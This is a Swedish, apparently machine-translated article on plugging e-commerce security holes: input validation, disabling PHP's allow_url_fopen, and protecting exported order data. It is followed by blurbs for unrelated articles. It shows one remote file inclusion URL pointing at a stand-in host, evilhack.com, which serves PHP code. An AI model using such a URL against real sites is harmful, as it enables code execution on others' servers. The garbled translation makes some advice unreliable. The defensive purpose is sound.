Säkerhet i en e-handel måste vara en stor hänsyn till vid utveckling av en e-handel eller programvara. En utvecklare måste vara medveten om alla de säkerhetspolitiska överväganden när man utformar en webbplats. Med e-handel allt vanligare i dessa dagar, är antalet säkerhetsattacker säkert ökar. Paranoia är en sund sak för e-handel webbutvecklare, vi måste hålla upp till porten med säkerhetsfrågor, och hålla våra öron och ögon öppna. Även följande brister är allvarliga, följande brister om sådana finns lätt fast.
Nedan är några säkerhetspolitiska överväganden som skall ingå vid utarbetandet av en webbplats. Denna artikel omfattar inte e-snatteri, se mina separat artikel om detta.
User ingång - varje ingång, oavsett om det kommer in en mängd, söka efter en produkt, ange ett namn etc, måste valideras efter misstänkta tecken. Om detta inte görs är det möjligt att komma in "?>", sista slut-taggar i PHP och utföra en del PHP-kod.
Det är betydligt säkrare att siffror och bokstäver AZ (versaler ingår) och 0-9 och ingenting annat, snarare än att göra en lista över alla tecken som inte borde vara där. Validering skriptet måste bläddra igenom varje tecken en efter en. Detta måste uppnås med i server side validering, inte Javascript. Använda serversidan indatavalidering är viktigt att hålla ute oönskade tecken
Det finns en annan viktig vid utförande av PHP-kod. När du använder PHP finns en inställning som kallas allow_url_fopenär som gör det möjligt att öppna filer från ett PHP-skript. Denna inställning bör vara avstängd, inte är absolut nödvändigt.
Bara tänk att du har PHP-script för både fast sidhuvud och sidfot, samt åtkomst till webbsidor som du skulle skriva i http://www.mysite.com/index.php?page=page2. Allt som krävs är en angripare att köra ett skript genom att ändra dessa parametrar genom att skriva in "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" med några PHP-kod i filen "hacker.txt". Du kunde ha något hända, filer PHP läsa, bort viktig information stulen.
Om du inte är säker om den här inställningen är på eller av, vänligen kopiera följande PHP-kod i en textfil och ladda upp den till din webbserver:
phpinfo ();
?>
När du tar skript på din webbserver, bör du komma över inställningen allow_url_fopenär under konfiguration.
En dator användare, kan under normala omständigheter inte hitta värdet för denna inställning.
Var försiktig med exporterade data som order, produkter i CSV-och mySQL filer. Om detta data exporteras från ett skript och hålls på webbservern under ett gemensamt filnamn, dvs. http://www.mysite.com/admin/output_tables.csv. Detta är egentligen bara ett problem när de exporterade data finns i en fil i en katalog som är tillgänglig för allmänheten. Det finns två sätt att förhindra denna trygghet kryphål - För det första har utdatafilen bakom en lösenordsskyddad katalog, dels har de data som finns inuti en HTML textarea form element på ett manus. Den storeowner kan sedan kopiera informationen från textfil och skapa en ny fil på sin dator och klistra in informationen här.
Allt som krävs är en hackare att hitta filnamnet genom att kolla e-handel programvara demo hemsida och leta efter samma filnamn på en verklig plats.
Nedan listas fler artiklar med anknytning till ovan nämnda artikel från "E-handel" Artikel kategori.
Är intresserade av ovanstående artikel "E-Commerce Security - plugga igen säkerhetshål" är också intresserade av relaterade artiklar som anges nedan:
Köra ett e-handelsföretag är inte bara om att hålla din webbplats igång. Kunder litar på din förmåga att tjäna dem via telefon, fax, e-post eller på annat sätt, och det kräver alla dina system att arbeta för att kunna uppfylla kundernas önskemål.
Bara ett par dagar tillbaka Jag hade en pratstund med min vän. Han firade sin baby's 1: a födelsedag och fick springa mellan sitt modersmål i Kerala och Chennai, hans arbetsplats. Han och hans bättre hälft reste mellan dessa platser minst 4 gånger under senaste månaden.
Om du har varit med e-handel för någon tid, skulle du ha känt att det finns fler scamers än äkta de grossister som tillhandahåller tjänster dropshipp katalog. I en värld av e-affärer, Salehoo and Worldwide Brands är båda välrenommerade leverantörer som har vunnit popularitet under de senaste åren.
Om du någonsin har haft en online återförsäljare, har du förmodligen redan hört om Salehoo eller ens använda det till din fördel. Om du just har börjat med ditt företag, kan du förväxlas med det blandade Salehoo recensioner där ute. Låt oss nu ta en titt på vad Salehoo verkligen handlar om och de tjänster de erbjuder som många tenderar att förbise.
Hur många vet du som har köpt något på nätet? Om du gillar mig en hel del, det är därför ecommerce är världens nya online shopping mall. Men vem driver dessa online-butiker? Människor precis som du och jag, det är därför denna verksamhet blomstrar och kommer att fortsätta att högkonjunkturen nu och långt in i framtiden.
Om du är ett stort fan av den senaste elektroniska produkter, kan du frestas av tanken på att köra din egen affärsverksamhet inom elektronik. Det är inte så svårt att komma igång när du tar full nytta av den rätt drop shipping elektronik service och det finns gott för dig att välja mellan.
Visste du att åka till din lokala närbutik och undrar vad det skulle vara om du ägt den? Skulle du vara en bra ägare, kommer folk som du? Väl här artikeln kommer att visa dig fördelarna med att äga en egen online-butik, eller allmänt känt som e-handel som skiljer sig från en verklig lokala närbutik.
